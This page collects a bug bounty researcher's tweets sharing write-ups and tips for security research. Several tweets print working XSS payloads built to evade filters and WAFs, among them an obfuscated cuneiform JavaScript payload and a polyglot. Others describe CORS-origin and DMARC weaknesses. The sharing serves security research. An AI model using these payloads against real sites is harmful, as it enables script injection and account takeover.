Contents

A write-up has been published about the CVE-2020-8512 discovered by me in +25.000 Icewarp Servers

thanks to John Leyden & @jameswalk_er for this https://t.co/tfgmnzMbh1#bugbounty #cybersecurity

— Lütfü Mert Ceylan (@lutfumertceylan) September 9, 2021

Top 25 Vulnerability Parameters based on frequency

Vulnerable parameters including 𝗦𝗤𝗟𝗶, 𝗫𝗦𝗦, 𝗦𝗦𝗥𝗙, 𝗥𝗖𝗘, 𝗫𝗦𝗦, 𝗢𝗽𝗲𝗻 𝗥𝗲𝗱𝗶𝗿𝗲𝗰𝘁 that can be used in automation tools or manual recon. 🛡️🧙‍♂️https://t.co/D7j9jXfinM#bugbounty #bugbountytips #cybersecurity

— Lütfü Mert Ceylan (@lutfumertceylan) February 6, 2021

a Javascript Polyglot for Cross-Site Scripting (XSS) 🛡️

<video src=">" onerror=setTimeout`confirm\x281\x29`>

-unicoded chars
-DOM window
-uncommon tags for filters
-various mimics#bugbounty #bugbountytips #cybersecurity pic.twitter.com/d7mOadnFRq

— Lütfü Mert Ceylan (@lutfumertceylan) January 25, 2021

Account Takeover via Web Cache Poisoning based Reflected XSS

I wrote a write-up about combining Web Cache Poisoning with rXSS vulnerability. In this way, the impact has been escalated. 🧙‍♂️https://t.co/19UaCTiPqo#bugbounty #bugbountytips #cybersecurity

— Lütfü Mert Ceylan (@lutfumertceylan) December 27, 2020

If you are curious about the working structure of this payload, you can find out with this tool. (thanks to @aemkei)https://t.co/RCvxWOiuoT pic.twitter.com/Hqa0myKfmQ

— Lütfü Mert Ceylan (@lutfumertceylan) December 14, 2020

an XSS payload, Cuneiform-alphabet based

𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()#bugbounty #bugbountytips #cybersecurity pic.twitter.com/dYFmWlEAR8

— Lütfü Mert Ceylan (@lutfumertceylan) December 14, 2020

a Python Snippet to try Race Condition weakness in Turbo Intruder

Source: https://t.co/bdf5EKQGqE#bugbounty #bugbountytips #bugbountytip #infosec #cybersecurity pic.twitter.com/VpuKF7DlQt

— Lütfü Mert Ceylan (@lutfumertceylan) October 27, 2020

an XSS payload generated using JSfuck, for bypass attribute filters

Source: https://t.co/8W2jok2ZvM#bugbounty #bugbountytips #bugbountytip #cybersecurity #infosec pic.twitter.com/hOORASpbcZ

— Lütfü Mert Ceylan (@lutfumertceylan) October 23, 2020

an XSS payload to bypass some waf & filters in Firefox

<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">#bugbounty #bugbountytips #bugbountytip #infosec #cybersecurity #ethicalhacking pic.twitter.com/YwxpP715Rq

— Lütfü Mert Ceylan (@lutfumertceylan) October 4, 2020

I wrote a write-up about Clickjacking vulnerability. This vulnerability causes Account Takeover weakness. 🧙‍♂️🪄https://t.co/tkf72QfHop#bugbounty #bugbountytips #ethicalhacking #cybersecurity #infosec #bugbountytip

— Lütfü Mert Ceylan (@lutfumertceylan) September 27, 2020

I wrote a write-up about content spoofing vulnerability I found. This vulnerability could lead to users being manipulated. I know that this vulnerability is simply and very low impact. :) https://t.co/oLMVSyWbKW#bugbounty #bugbountytips #ethicalhacking #cybersecurity #infosec

— Lütfü Mert Ceylan (@lutfumertceylan) August 11, 2020

Informations after a simple Github research..
Github is really like a black hole 🧙‍♂️#bugbounty #bugbountytips #cybersecurity #infosec pic.twitter.com/z9cX4FQE5p

— Lütfü Mert Ceylan (@lutfumertceylan) July 27, 2020

🌋 Due to DMARC Functions, sp Parameter Weakness 🌋

If the value of the sp parameter is "none", weakness occurs even if the value of p is not "none".

[email protected] --> Not Vulnerable
[email protected] --> Vulnerable#bugbounty #bugbountytips #bugbountytip #cybersecurity #infosec pic.twitter.com/4PJIwobMpj

— Lütfü Mert Ceylan (@lutfumertceylan) July 20, 2020

🚀 How can you make a Javascript Polyglot for XSS? 🚀#BugBounty #bugbountytips #bugbountytip #CyberSecurity #infosec #hacked pic.twitter.com/qmd3qUpQ2g

— Lütfü Mert Ceylan (@lutfumertceylan) July 17, 2020

I was included in the Hall of Fame (1st quarter) by Mozilla!🥳https://t.co/IpMxI18LCm#bugbounty #infosec #ethicalhacking #CyberSecurity #halloffame

— Lütfü Mert Ceylan (@lutfumertceylan) July 12, 2020

I writed a write-up about CORS vulnerability. This vulnerability causes both Account Takeover and Sensitive Data Leakage weakness. 🛡️🧙‍♂️https://t.co/zaoorAh1cD#bugbounty #bugbountytips #ethicalhacking #cybersecurity #infosec

— Lütfü Mert Ceylan (@lutfumertceylan) July 4, 2020

🛡️ CORS Protection Bypass 🛡️

If the system only allows "Origin: https://t.co/YB5OiaWlDW",

Use a gTLD containing "com" -> Origin: https://t.co/S0FQ43tWro#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking

— Lütfü Mert Ceylan (@lutfumertceylan) July 1, 2020